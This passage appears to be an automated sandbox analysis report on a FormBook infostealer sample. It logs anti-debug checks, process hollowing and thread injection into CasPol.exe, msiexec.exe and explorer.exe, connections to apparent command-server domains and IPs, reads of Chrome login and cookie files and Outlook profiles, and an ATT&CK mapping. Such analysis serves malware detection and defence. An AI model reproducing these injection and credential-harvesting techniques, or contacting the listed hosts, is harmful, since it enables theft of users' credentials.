          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454FD9B mov eax, dword ptr fs:[00000030h]4_2_0454FD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454FD9B mov eax, dword ptr fs:[00000030h]4_2_0454FD9B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A185 mov eax, dword ptr fs:[00000030h]4_2_0454A185
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453C182 mov eax, dword ptr fs:[00000030h]4_2_0453C182
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542581 mov eax, dword ptr fs:[00000030h]4_2_04542581
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04512D8A mov eax, dword ptr fs:[00000030h]4_2_04512D8A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04541DB5 mov eax, dword ptr fs:[00000030h]4_2_04541DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04541DB5 mov eax, dword ptr fs:[00000030h]4_2_04541DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04541DB5 mov eax, dword ptr fs:[00000030h]4_2_04541DB5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045951BE mov eax, dword ptr fs:[00000030h]4_2_045951BE
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E05AC mov eax, dword ptr fs:[00000030h]4_2_045E05AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E05AC mov eax, dword ptr fs:[00000030h]4_2_045E05AC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045461A0 mov eax, dword ptr fs:[00000030h]4_2_045461A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045461A0 mov eax, dword ptr fs:[00000030h]4_2_045461A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045435A1 mov eax, dword ptr fs:[00000030h]4_2_045435A1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045969A6 mov eax, dword ptr fs:[00000030h]4_2_045969A6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DEA55 mov eax, dword ptr fs:[00000030h]4_2_045DEA55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045A4257 mov eax, dword ptr fs:[00000030h]4_2_045A4257
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04519240 mov eax, dword ptr fs:[00000030h]4_2_04519240
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04527E41 mov eax, dword ptr fs:[00000030h]4_2_04527E41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DAE44 mov eax, dword ptr fs:[00000030h]4_2_045DAE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045DAE44 mov eax, dword ptr fs:[00000030h]4_2_045DAE44
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453AE73 mov eax, dword ptr fs:[00000030h]4_2_0453AE73
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455927A mov eax, dword ptr fs:[00000030h]4_2_0455927A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CB260 mov eax, dword ptr fs:[00000030h]4_2_045CB260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CB260 mov eax, dword ptr fs:[00000030h]4_2_045CB260
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8A62 mov eax, dword ptr fs:[00000030h]4_2_045E8A62
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452766D mov eax, dword ptr fs:[00000030h]4_2_0452766D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov eax, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov ecx, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov eax, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04515210 mov eax, dword ptr fs:[00000030h]4_2_04515210
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451AA16 mov eax, dword ptr fs:[00000030h]4_2_0451AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451AA16 mov eax, dword ptr fs:[00000030h]4_2_0451AA16
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A61C mov eax, dword ptr fs:[00000030h]4_2_0454A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A61C mov eax, dword ptr fs:[00000030h]4_2_0454A61C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04533A1C mov eax, dword ptr fs:[00000030h]4_2_04533A1C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C600 mov eax, dword ptr fs:[00000030h]4_2_0451C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C600 mov eax, dword ptr fs:[00000030h]4_2_0451C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451C600 mov eax, dword ptr fs:[00000030h]4_2_0451C600
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04548E00 mov eax, dword ptr fs:[00000030h]4_2_04548E00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1608 mov eax, dword ptr fs:[00000030h]4_2_045D1608
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04528A0A mov eax, dword ptr fs:[00000030h]4_2_04528A0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CFE3F mov eax, dword ptr fs:[00000030h]4_2_045CFE3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451E620 mov eax, dword ptr fs:[00000030h]4_2_0451E620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04554A2C mov eax, dword ptr fs:[00000030h]4_2_04554A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04554A2C mov eax, dword ptr fs:[00000030h]4_2_04554A2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8ED6 mov eax, dword ptr fs:[00000030h]4_2_045E8ED6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04558EC7 mov eax, dword ptr fs:[00000030h]4_2_04558EC7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045436CC mov eax, dword ptr fs:[00000030h]4_2_045436CC
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CFEC0 mov eax, dword ptr fs:[00000030h]4_2_045CFEC0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542ACB mov eax, dword ptr fs:[00000030h]4_2_04542ACB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045276E2 mov eax, dword ptr fs:[00000030h]4_2_045276E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542AE4 mov eax, dword ptr fs:[00000030h]4_2_04542AE4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045416E0 mov ecx, dword ptr fs:[00000030h]4_2_045416E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454D294 mov eax, dword ptr fs:[00000030h]4_2_0454D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454D294 mov eax, dword ptr fs:[00000030h]4_2_0454D294
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AFE87 mov eax, dword ptr fs:[00000030h]4_2_045AFE87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452AAB0 mov eax, dword ptr fs:[00000030h]4_2_0452AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452AAB0 mov eax, dword ptr fs:[00000030h]4_2_0452AAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454FAB0 mov eax, dword ptr fs:[00000030h]4_2_0454FAB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045152A5 mov eax, dword ptr fs:[00000030h]4_2_045152A5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E0EA5 mov eax, dword ptr fs:[00000030h]4_2_045E0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E0EA5 mov eax, dword ptr fs:[00000030h]4_2_045E0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E0EA5 mov eax, dword ptr fs:[00000030h]4_2_045E0EA5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045946A7 mov eax, dword ptr fs:[00000030h]4_2_045946A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8B58 mov eax, dword ptr fs:[00000030h]4_2_045E8B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451F358 mov eax, dword ptr fs:[00000030h]4_2_0451F358
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451DB40 mov eax, dword ptr fs:[00000030h]4_2_0451DB40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452EF40 mov eax, dword ptr fs:[00000030h]4_2_0452EF40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04543B7A mov eax, dword ptr fs:[00000030h]4_2_04543B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04543B7A mov eax, dword ptr fs:[00000030h]4_2_04543B7A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451DB60 mov ecx, dword ptr fs:[00000030h]4_2_0451DB60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452FF60 mov eax, dword ptr fs:[00000030h]4_2_0452FF60
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8F6A mov eax, dword ptr fs:[00000030h]4_2_045E8F6A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453F716 mov eax, dword ptr fs:[00000030h]4_2_0453F716
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D131B mov eax, dword ptr fs:[00000030h]4_2_045D131B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AFF10 mov eax, dword ptr fs:[00000030h]4_2_045AFF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AFF10 mov eax, dword ptr fs:[00000030h]4_2_045AFF10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E070D mov eax, dword ptr fs:[00000030h]4_2_045E070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E070D mov eax, dword ptr fs:[00000030h]4_2_045E070D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A70E mov eax, dword ptr fs:[00000030h]4_2_0454A70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A70E mov eax, dword ptr fs:[00000030h]4_2_0454A70E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454E730 mov eax, dword ptr fs:[00000030h]4_2_0454E730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04514F2E mov eax, dword ptr fs:[00000030h]4_2_04514F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04514F2E mov eax, dword ptr fs:[00000030h]4_2_04514F2E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045953CA mov eax, dword ptr fs:[00000030h]4_2_045953CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045953CA mov eax, dword ptr fs:[00000030h]4_2_045953CA
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045537F5 mov eax, dword ptr fs:[00000030h]4_2_045537F5
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045403E2 mov eax, dword ptr fs:[00000030h]4_2_045403E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045403E2 mov eax, dword ptr fs:[00000030h]4_2_045403E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045403E2 mov eax, dword ptr fs:[00000030h]4_2_045403E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045403E2 mov eax, dword ptr fs:[00000030h]4_2_045403E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045403E2 mov eax, dword ptr fs:[00000030h]4_2_045403E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045403E2 mov eax, dword ptr fs:[00000030h]4_2_045403E2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453DBE9 mov eax, dword ptr fs:[00000030h]4_2_0453DBE9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04542397 mov eax, dword ptr fs:[00000030h]4_2_04542397
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454B390 mov eax, dword ptr fs:[00000030h]4_2_0454B390
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04528794 mov eax, dword ptr fs:[00000030h]4_2_04528794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04597794 mov eax, dword ptr fs:[00000030h]4_2_04597794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04597794 mov eax, dword ptr fs:[00000030h]4_2_04597794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04597794 mov eax, dword ptr fs:[00000030h]4_2_04597794
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D138A mov eax, dword ptr fs:[00000030h]4_2_045D138A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045CD380 mov ecx, dword ptr fs:[00000030h]4_2_045CD380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04521B8F mov eax, dword ptr fs:[00000030h]4_2_04521B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04521B8F mov eax, dword ptr fs:[00000030h]4_2_04521B8F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04544BAD mov eax, dword ptr fs:[00000030h]4_2_04544BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04544BAD mov eax, dword ptr fs:[00000030h]4_2_04544BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04544BAD mov eax, dword ptr fs:[00000030h]4_2_04544BAD
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E5BA5 mov eax, dword ptr fs:[00000030h]4_2_045E5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0040CF93 LdrLoadDll,2_2_0040CF93
          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.tf8dangky.online
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 164.88.201.214 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.sandpiper-apts.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeNetwork Connect: 163.44.198.50 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hvlandscapes.biz
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.151.199.52 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.138.206.213 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.n-r-eng.com
          Source: C:\Windows\explorer.exeDomain query: www.teammart.online
          Source: C:\Windows\explorer.exeDomain query: www.laylaroseuk.com
          Source: C:\Windows\explorer.exeNetwork Connect: 103.221.223.104 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mitsubangsaen.online
          Source: C:\Windows\explorer.exeDomain query: www.suachuadienlanh247.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: D90000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B5F008Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.512823887.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.461530345.0000000008356000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.525383078.000000000835D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.252270901.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.511672608.0000000000AC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.253127150.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.512823887.0000000001080000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.511832982.0000000000860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511979263.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.511441474.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.285119335.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.281003915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          File and Directory Discovery          		Remote Services11
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts812
          Process Injection          		11
          Deobfuscate/Decode Files or Information          		LSASS Memory12
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)4
          Obfuscated Files or Information          		Security Account Manager21
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)13
          Software Packing          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Timestomp          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Masquerading          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)812
          Process Injection          		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

